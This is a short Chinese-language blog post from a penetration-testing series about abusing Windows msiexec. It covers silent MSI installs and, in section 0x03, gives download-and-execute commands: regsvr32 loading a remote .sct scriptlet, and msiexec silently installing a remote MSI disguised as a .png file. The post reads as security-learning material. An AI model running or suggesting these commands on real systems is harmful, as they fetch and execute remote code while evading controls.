CMD系列--渗透测试中的msiexec

in #cmd7 years ago (edited)

渗透测试中的msiexec



123.png

0x00 前言

安装包还有一个常见的是msi文件,可在命令行下通过msiexec安装,学习下msiexec在渗透测试中的利用技巧

0x01 简介

msiexec:

系统进程,是Windows Installer的一部分

用于安装Windows Installer安装包(MSI)

一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大

系统自带,在命令行下使用,参数说明如下:

msiexec -h

0x02 制作.msi文件

等价于在命令行下执行如下命令:

msiexec /i test.msi

同时会弹出安装的对话框,可以使用/q参数来隐藏安装界面

msiexec /q /i test.msi

0x03 远程下载执行msi文件

regsvr32 /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll

将msi文件上传到服务器,通过如下命令远程执行:

msiexec /q /i https://raw.githubusercontent.com/3gstudent/test/master/testmsi.png

0x04 学习参考:

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84msiexec/

http://www.4hou.com/technology/2742.html

#cn #cn-reader #cn-funny #windows
7 years ago in #cmd by
$0.06
  • Past Payouts $0.06
  • - Author $0.06
  • - Curators $0.00
14 votes
Reply 8
Sort:  
  • Trending